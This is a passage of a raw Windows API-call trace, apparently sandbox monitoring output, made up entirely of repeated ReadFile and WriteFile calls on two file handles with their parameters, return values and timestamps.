ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.468] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x368, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.468] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.469] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.469] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.470] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x31e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.470] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.471] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.471] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.472] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x376, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.472] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.473] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.473] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.474] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.474] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.475] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x331, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.475] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.476] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2da, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.476] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.477] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.477] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.478] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x272, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.478] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.478] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.479] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.479] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.480] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.480] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.481] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.481] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bb, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.482] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.482] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.482] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.483] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x241, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.483] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.484] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.484] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.485] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x263, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.485] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.486] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x254, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.486] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.487] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.487] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.488] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.488] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.489] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.489] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.490] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.490] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.491] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x308, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.491] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.492] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.492] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.493] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x344, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.493] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.494] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b4, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.494] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.495] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x244, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.495] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.495] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x23b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.496] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.496] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x25f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.497] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.497] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.498] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.498] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.499] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.499] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x36a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.500] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.500] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x341, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.501] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.501] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.502] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.502] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x362, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.503] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.503] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.504] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.505] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.505] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.505] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.506] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.506] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.507] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.507] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.508] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xe6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.508] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.509] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.509] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.510] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3d3, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.510] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.510] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x395, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.511] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.512] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.512] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.512] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.513] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.513] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.514] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0022.514] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0022.515] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, 